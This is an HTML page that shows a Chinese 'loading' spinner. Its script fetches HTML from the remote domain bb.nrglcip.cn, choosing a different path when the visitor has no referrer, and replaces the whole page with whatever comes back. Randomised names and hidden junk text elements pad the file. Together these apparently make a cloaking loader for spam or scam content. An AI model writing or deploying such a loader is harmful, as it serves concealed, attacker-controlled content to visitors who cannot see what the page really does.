<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .YiJ7Tj2 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .YiJ7Tj2 .hPU3V3U6z {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .YiJ7Tj2 .content {
            line-height: 50px;
            text-align: center
        }

        .YiJ7Tj2 .img {
            width: 100%
        }

        .YiJ7Tj2 .xMwyRItlSM {
            text-align: center
        }

        .YiJ7Tj2 .xMwyRItlSM span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .YiJ7Tj2 .xMwyRItlSM span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .YiJ7Tj2 .xMwyRItlSM span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .YiJ7Tj2 .xMwyRItlSM span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .YiJ7Tj2 .xMwyRItlSM span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .YiJ7Tj2 .xMwyRItlSM span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .YiJ7Tj2 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function Z0uFjDnGAiU(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var kkdSa = Z0uFjDnGAiU('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ kkdSa +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ kkdSa +".html?a=share";
		}
		
        GHTC9djR2E=url+"#"+new Date().getTime();
        GHTC9djR2E && function() {
            $.get(GHTC9djR2E, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<li style='display:none' >MN2enTH9M6HO3yNVPwRjaFMUqmPYcyqWhzlV</li>
<h1 style='display:none' >wQVlLaR3dzrkY5P3RzukLYfPekbPhf66zdkNkn</h1>
<h1 style='display:none' >wQVlLaR3dzrkY5P3RzukLYfPekbPhf66zdkNkn</h1><div class="YiJ7Tj2">
    <div class="hPU3V3U6z">
        <div class="xMwyRItlSM">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<img  src='' style='display:none'>
<a  href='#' style='display:none'>MrKzCdHys2uFC3OWVftpewnfLhvCXZekFu</a>
<b style='display:none' >F4ZVyKWxqWFkU</b>
<h1 style='display:none' >Yb5OhkmwgwysNNpFnt</h1>
<img  src='' style='display:none'>
<span style='display:none'>Ob7Xj5BhdRxqijR8Odz6p1CYGbsge0x8vFZI2RqvbbKw1sYr7PGzVnh02a3</span>
<h1 style='display:none' >Yb5OhkmwgwysNNpFnt</h1>
<img  src='' style='display:none'>
<p  style='display:none'>gIoYHmF59V7xD47D7nv36L</p></body>
</html>